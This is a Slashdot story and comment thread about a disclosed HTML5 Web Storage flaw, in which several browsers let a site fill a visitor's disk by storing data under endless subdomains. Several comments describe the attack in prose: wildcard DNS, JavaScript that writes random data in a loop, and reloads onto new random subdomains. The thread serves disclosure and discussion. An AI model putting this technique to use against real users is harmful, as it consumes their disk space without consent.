Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Bug Chromium Data Storage Firefox Internet Explorer Opera Safari News

HTML5 Storage Bug Can Fill Your Hard Drive 199

Dystopian Rebel writes "A Stanford comp-sci student has found a serious bug in Chromium, Safari, Opera, and MSIE. Feross Aboukhadijeh has demonstrated that these browsers allow unbounded local storage. 'The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB). ... The current limits are: 2.5 MB per origin in Google Chrome, 5 MB per origin in Mozilla Firefox and Opera, 10 MB per origin in Internet Explorer. However, what if we get clever and make lots of subdomains like 1.filldisk.com, 2.filldisk.com, 3.filldisk.com, and so on? Should each subdomain get 5MB of space? The standard says no. ... However, Chrome, Safari, and IE currently do not implement any such "affiliated site" storage limit.' Aboukhadijeh has logged the bug with Chromium and Apple, but couldn't do so for MSIE because 'the page is broken" (see http://connect.microsoft.com/IE). Oops. Firefox's implementation of HTML5 local storage is not vulnerable to this exploit."
This discussion has been archived. No new comments can be posted.

HTML5 Storage Bug Can Fill Your Hard Drive

Comments Filter:
  • Re:Bug, or exploit? (Score:5, Informative)

    by DarkRat ( 1302849 ) on Thursday February 28, 2013 @12:18PM (#43035371)
    no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked
  • by The Mighty Buzzard ( 878441 ) on Thursday February 28, 2013 @12:24PM (#43035485)
    Really? You've never admin'd a dns server then. It's trivial to have one respond to wildcard subdomain names that you could generate dynamically on page load with one line of javascript.
  • by arth1 ( 260657 ) on Thursday February 28, 2013 @12:38PM (#43035711) Homepage Journal

    It doesn't take much work or time to set up a wildcard CNAME entry pointing to a single web server that answers a wildcard. You now have billions of subdomains with a couple of minutes of work.
    The web instance serves a short javascript which generates a boatload of data on the client side, and then calls a random subdomain to reload the js with a new domain name.

    All this can be linked to a single ad (or blog comment, for vulnerable boards that allow css exploits).

  • by Anonymous Coward on Thursday February 28, 2013 @12:41PM (#43035733)

    , transfer a lot of data and incur bandwidth charges,

    Posting anonymously since this shows how it could be done.

    I don't see any need to transfer data. Simply generate random strings programatically. One could easily write a few lines of code. The storage API is a 'key' and 'value' system, so just randomly generate keys and randomly generate values in a loop. Super easy. For the subdomain stuff, like others have said, wildcard for DNS. Then just serve the small js file that runs, then programtically generates a new random subdomain to dynamically load the js file.

    The end point is that you don't need a lot of data bandwidth to screw up someone's computer.

  • by DragonWriter ( 970822 ) on Thursday February 28, 2013 @12:58PM (#43035935)

    no. it's a bug. the HTML5 spec clearly states that this exact behaviour should be looked out for and blocked

    Its not a bug. While the Web Storage API Candidate Recommendation (related to, but not part, of, the HTML5 spec) both says that user agents should set a per-origin storage limit and should identify and prevent use of "origins of affiliated sites" to circumvent that limit, it doesn't specify either what constitutes an "affiliated site", and neither of those things that it says "should" be done are requirements of the specification. "Should" has a quite specific meaning in the specification (defined by reference in the spec to RFC2119 [ietf.org]), and its not the same as "must", instead:

    SHOULD This word, or the adjective "RECOMMENDED", mean that there may exist valid reasons in particular circumstances to ignore a particular item, but the full implications must be understood and carefully weighed before choosing a different course.

    So, its both a recommendation rather than a requirement, and not specified clearly enough to be implemented. There are some cases where origins of the same second-level domain are meaningfully affiliated, and some times where they are not (for a clear case of the latter, consider subdomains of ".co.uk".) Its pretty clear that origins which differ only in protocol are almost always going to be affiliated by any reasonable definition (e.g., http://www.example.com/ [example.com] and https://www.example.com/ [example.com] which are different origins), but no automatic identification of origin affiliation by subdomain can be done simply without understanding of per-domain policies from the TLD down to the first level at which all subdomains are affiliated. (And this is a problem which will get worse with the planned explosion of TLDs.) W

  • by DragonWriter ( 970822 ) on Thursday February 28, 2013 @01:43PM (#43036587)

    You must be awful fun when talking to customers. They tend not to understand the distinction between "shall" and "should".

    There is a reason why internet specifications (whether or not they are from IETF, and often whether or not they are even intended as standards-track) reference the RFC2119 definitions. "MUST" vs. "SHOULD" is an important distinction.

    In this particular case, whats even more important is that the recommended functionality at issue isn't defined at all, there is just one example -- and the example doesn't fully specify the origins, so its an incomplete example -- given and no definition of the parameters of the identification of "affiliated origins". So if it was a "MUST", it would be a broken standard (since it would be impossible to assess conformance), and as it is, its impossible to say whether a particular implementation even implements the recommended functionality.

    "there may exist valid reasons in particular circumstances to ignore a particular item" - in other words, this is a case where the feature should ALWAYS be applied to generic software because that must deal with all circumstances, not just "particular" ones

    Any particular user agent is a "particular circumstance" (it is specific software with a specific use case within the scope of all possible kinds of user agents which might implement the Web Storage API); there is no such thing as an implementation that must deal with "all circumstances".

    It really should not be hard to have a popup that says "This web page wants to create local storage on your computer allow/disallow"

    Its not at all hard, but that's not related to the recommendation to implement per-origin quotas, or the further recommendation to build on top of the per-origin quotas functionality to detect and limit the use of "affiliated origins" to circumvent the per origin quotas, which is what is at issue here. Per-origin allow/disallow for Web Storage use isn't even a recommendation of the specification. (Though it is explicitly permitted behavior.)

  • by TheRaven64 ( 641858 ) on Thursday February 28, 2013 @01:58PM (#43036769) Journal
    You misunderstand how the attack works. The client-side code is allowed to store 5-10MB per domain, but it can generate this data (math.random() will do it fine). The per-domain thing mean that you need one HTTP request per 5-10MB, but on the server that will be a wildcard DNS entry always resolving to the same server. If you set the cache headers with a sufficiently long timeout, then you can probably have a single site hosting the .js (so the browser will only request it once) and then just send a tiny HTML page referencing it. The JavaScript then creates a new iframe with a new (random) subdomain as the target, and so you each HTTP request to your server (total of about 1KB of traffic) generates 5-10MB of data on the client's hard disk.
  • by Anonymous Coward on Thursday February 28, 2013 @02:23PM (#43037103)

    If you don't like "nearly infinite", it might be better to avoid saying things like "a billionth of a billionth of infinite", and even "infinity minus seven", without giving some sort of definition of what you're talking about. If you mean cardinals, then the values you appear to be talking about are trivially the same as the infinite cardinal you started with. If you mean ordinals, it doesn't look like there's any well-defined thing that corresponds to the phrases you're using.

    Your best bet might be to read up on hyperreals, because in that system expressions like r - 7 and r * 10^-18 do actually make some non-trivial sense where r is infinite, and your intuition is correct that there's no sensible definition of a "nearly infinite" hyperreal. But until you have some understanding of the transfer principle, or at least are familiar with the basic properties of the hyperreals, you'd be well advised to avoid such expressions, especially if you're math-naziing against everyday expressions like "nearly infinite" whose intended meaning is entirely clear. Take a look at this [mathforum.org] (or at this [princeton.edu] if you're more mathematically trained).

    Not trolling -- you're obviously interested in mathematics -- just pointing your enthusiasm in a useful direction :-)

"Experience has proved that some people indeed know everything." -- Russell Baker

Working...